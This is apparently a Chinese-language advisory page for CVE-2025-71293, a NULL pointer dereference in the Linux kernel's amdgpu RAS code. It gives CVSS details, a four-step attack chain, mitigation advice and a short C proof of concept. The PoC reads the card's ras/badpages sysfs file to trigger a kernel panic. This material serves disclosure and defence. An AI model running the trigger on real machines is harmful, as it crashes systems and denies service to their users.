IPBUF安全漏洞报告
English
CVE-2025-71293 CVSS 5.5 中危

CVE-2025-71293 Linux内核amdgpu空指针解引用漏洞

披露日期: 2026-05-06
来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号
CVE-2025-71293
漏洞类型
空指针解引用
CVSS评分
5.5 中危
攻击向量
本地 (AV:L)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Linux Kernel

相关标签

Linux KernelDoSNULL Pointer Dereferenceamdgpu本地漏洞

漏洞概述

Linux内核中的drm/amdgpu/ras模块存在一个安全漏洞,该漏洞源于RAS数据分配逻辑在坏页检查之后执行。在特定情况下,如果EEPROM仅包含无效地址条目,系统会跳过数据分配步骤,导致后续访问空指针。这会引发内核空指针解引用错误,导致系统崩溃或拒绝服务。该漏洞需要本地低权限用户即可触发,虽然不影响数据的机密性和完整性,但会严重影响系统的可用性。

技术细节

该漏洞位于Linux内核的AMD GPU驱动程序的RAS(可靠性、可用性和可维护性)子系统中。具体的触发点在`amdgpu_ras_sysfs_badpages_read`函数。原代码逻辑先对EEPROM中的条目进行坏页检查,如果发现条目无效,则直接跳过,导致后续的RAS数据结构分配被跳过。然而,代码后续并未对指针是否为NULL进行校验便直接访问,导致读取偏移0x10处的内存。当攻击者通过本地系统读取对应的sysfs文件时,会触发此路径,导致内核页错误(Oops)和系统崩溃,造成拒绝服务。

攻击链分析

STEP 1
1. 获取访问权限
攻击者需要获取本地系统的低权限用户访问权限。
STEP 2
2. 识别目标硬件
确认系统使用受影响的AMD GPU硬件及存在漏洞的Linux内核版本。
STEP 3
3. 触发漏洞
攻击者读取/sys/class/drm/cardX/device/ras/badpages文件,触发amdgpu_ras_sysfs_badpages_read函数。
STEP 4
4. 执行崩溃
由于代码逻辑缺陷,函数访问空指针,导致内核崩溃(Kernel Panic),系统拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> /* * PoC for CVE-2025-71293 * Trigger: Read the sysfs badpages file on a system with vulnerable amdgpu driver. * Condition: EEPROM contains invalid address entries causing allocation skip. */ int main() { // The path might vary depending on the card number (card0, card1, etc.) const char *sysfs_path = "/sys/class/drm/card0/device/ras/badpages"; int fd; char buffer[1024]; printf("[+] Attempting to trigger CVE-2025-71293...\n"); printf("[+] Target: %s\n", sysfs_path); fd = open(sysfs_path, O_RDONLY); if (fd < 0) { perror("[-] Failed to open device file (Device not present or permissions denied)"); return EXIT_FAILURE; } // Reading the file triggers the vulnerable function amdgpu_ras_sysfs_badpages_read ssize_t bytes_read = read(fd, buffer, sizeof(buffer) - 1); if (bytes_read < 0) { perror("[-] Read failed"); } else { buffer[bytes_read] = '\0'; printf("[+] Read operation completed. If vulnerable, the kernel may panic.\n"); } close(fd); return EXIT_SUCCESS; }

影响范围

Linux Kernel (主分支及稳定分支,修复前)
Linux Kernel 6.8

防御指南

临时缓解措施
建议尽快更新操作系统内核以应用官方提供的补丁。在无法立即更新内核的情况下,应严格限制本地用户的访问权限,防止潜在攻击者读取相关系统文件。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表